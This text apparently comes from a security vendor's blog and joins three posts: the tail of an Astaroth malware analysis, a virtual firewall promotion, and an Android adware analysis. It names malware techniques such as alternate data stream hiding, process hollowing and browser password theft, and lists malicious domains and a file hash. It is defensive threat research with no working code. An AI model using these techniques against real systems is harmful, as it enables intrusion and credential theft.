The malware reads and decrypts the ADS content from desktop.ini:landoqeahjkygx.gif:

The malware uses the above decryption logic for all the encrypted files. The same decryption logic was also used in the previous version of Astaroth. Astaroth component files can be decrypted using the code below:

The malware searches for the files below, in sequence, on the victim’s system:

  • C:\Program Files\Diebold\Warsaw\unins000.exe
  • C:\Windows\SysWOW64\userinit.exe
  • C:\Windows\System32\userinit.exe


The malware finds C:\Windows\System32\userinit.exe and creates a new process into which it injects the ADS content from desktop.ini:landoqeahjkygx.gif:

The malware reads and decrypts a DLL from the ADS desktop.ini:landoqeahjkyg.gif, then uses process hollowing to load the decrypted DLL in memory:

The malware checks for the following installed antivirus software on the victim’s machine:

  • AVAST Software
  • AVG
  • Symantec
  • McAfee
  • COMODO
  • Bitdefender
  • ESET

The malware collects system information and saves it into the ADS desktop.ini:auid.log, as shown below:

Network:

The malware uses YouTube to host encrypted content, as shown below:

Other Component:

The malware contains the following well-known files:

WebBrowserPassView by NirSoft: a password recovery tool that reveals the passwords stored by browsers.

Mail Password Recovery by NirSoft: a password recovery tool that reveals the passwords and other account details for email clients.

Evidence of the detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

How to Protect Multi-Cloud Environments with a Virtual Firewall

Virtualization technology is powering a momentous revolution in today’s modern data centers and clouds, leading to designs that are commonly a mix of private, public and hybrid cloud computing environments.

International Data Corporation (IDC) research predicts that more than 90% of organizations will have some portion of their applications or infrastructure running in the cloud by the end of 2024.

As multi-cloud migration happens and organizations embrace technologies, such as containers, network virtualization must expand to adequately secure highly dynamic environments ranging from public clouds to private clouds to data centers. Otherwise, organizations face the risks of visibility blind spots and control challenges.

To address this, organizations are implementing cloud security solutions that operate together and are easily managed. The benefits of cloud computing are well-known and significant. However, so are the security challenges, exemplified by the many recent high-profile data breaches. Whether stored in a physical data center or in a public, private or hybrid cloud, your data is the hacker’s goal.

Securing the cloud introduces a range of challenges, including a lack of network traffic visibility, unpredictable security functionality and the struggle to keep pace with the rate of change commonly found in cloud computing environments. To be effective, organizations need a cloud security solution that:

  • Identifies and controls network traffic within the cloud based on identity, not the ports and protocols they may use.
  • Stops malware from gaining access to and moving laterally within the cloud.
  • Determines who should be allowed to use the applications, and grants access based on need and credentials.
  • Streamlines deployment and gets a new instance up and running with a click. You do not want to configure each virtual firewall, since that is time-consuming. Ideally, you have a pre-defined configuration pushed to the device and it is up and running.
  • Cost-effectively replaces expensive WAN connection technologies, such as MPLS, with secure SD-WAN.
  • Simplifies administration and minimizes the security policy delay as virtual machines (VM) are added, removed or moved within the cloud environment.

Securing the cloud with SonicWall NSv virtual firewalls

Recently, SonicWall announced new firmware, SonicOS 6.5.4, for its virtual firewall platforms to provide feature parity with its hardware firewall platform.

SonicWall Network Security virtual (NSv) firewalls now support secure SD-WAN, Zero-Touch Deployment, DNS security, a RESTful API and many more features that help solve the aforementioned problems.

SonicWall NSv firewalls help security teams reduce different types of security risks and vulnerabilities, which can cause serious disruption to business-critical services and operations.

With full-featured security tools and services, including reassembly-free deep packet inspection (RFDPI), security controls and networking services equivalent to what a SonicWall physical firewall provides, NSv effectively shields all critical components of your private/public cloud environments.

NSv is easily deployed and provisioned in a multi-tenant virtual environment, typically between virtual networks (VN). This allows it to capture communications and data exchanges between VMs for automated breach prevention, while establishing stringent access control measures for data confidentiality and VM safety and integrity.

Security threats (such as cross-virtual-machine or side-channel attacks and common network-based intrusions and application and protocol vulnerabilities) are neutralized successfully through SonicWall’s comprehensive suite of security services.

All VM traffic is subjected to multiple threat analysis engines, including intrusion prevention, gateway anti-virus and anti-spyware, cloud anti-virus, botnet filtering, application control and the Capture Advanced Threat Protection (ATP) multi-engine sandbox.

Aggressive Android adware communicates with a number of malicious domains

The SonicWall Capture Labs Threat Research Team came across an adware sample that showed high network activity during its execution. This is typical behavior for adware, but this sample communicated with a number of malicious domains, which piqued our interest.

Infection Cycle

Among the permissions requested by this adware, a few high-risk ones are listed below:

  • Read settings
  • Write settings
  • Write external storage
  • Read sms
  • Send sms
  • Receive sms
  • System alert window
  • Receive boot completed

Soon after starting the adware app we began seeing ads that covered parts of the screen. We saw these advertisements at different times during our analysis. The advertisements were for casual games most of the times (more on this later in the blog).

Network Communications

We saw a spike in network traffic once we started the app; a network capture revealed a multitude of domains contacted in quick succession. A number of these domains have been flagged as malicious on VirusTotal, as a few of them have connections with, or host, malicious applications.

Below are a few of the domains that were contacted, along with VirusTotal’s highlights about them:

45.33.125.188

139.162.141.85

cdn.jsdelivr.net

ps.okyesmobi.com:8802

In one instance we saw the IMEI of our device being transmitted to one of the contacted domains:

Some of the contacted domains host a number of malicious APK files; below are VirusTotal graphs for a few of them:

Spike in Network consumption

During our analysis we measured the network consumption of the infected device. Unsurprisingly, we saw high network consumption from the adware and from the apps it installed, as shown below:

This can be extremely annoying, especially for users with limited-data mobile plans.

Installed apps and shortcuts

We observed a few shortcuts on the home screen for different apps pushed by the adware:

Later, we saw a few apps installed on the device without our knowledge:

Gaming for ad profit

During our analysis we saw a lot of game-related ads on the screen. We decided to try a few of them out. When playing these games we observed something simple yet clever:

  • The games are of the ‘endless runner’ category, where the player accumulates points the longer they stay alive
  • Whenever the player loses, an advertisement is played

In short, the hosting company profits whenever the player loses. So how do they maximize their profits? By making the games harder!

Compared to typical casual games of this kind, we found the level of difficulty to be rather steep. As a result we ended up losing more frequently, which resulted in ads being displayed each time we lost.

Overall this contributed to an increase in network consumption and advertisement-related profit for the uploaders.

Rooting mechanisms

The adware constantly requested superuser permissions once we started it:

One of the files present in the adware’s installed folder is a script file that contains code to root the device:

Closing thoughts

Overall this adware performs a lot of activities after infecting a device. It displays advertisements, installs rogue apps, communicates with malicious domains and increases the overall network consumption of the device. We saw a few instances where sensitive information from the device was leaked, but the fact that it communicates with domains hosting malicious content is worrying.

SonicWall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.Adware.LO

Indicators of Compromise (IOCs):

  • f1c7ff832393feac50d2ed3dc80ba3b8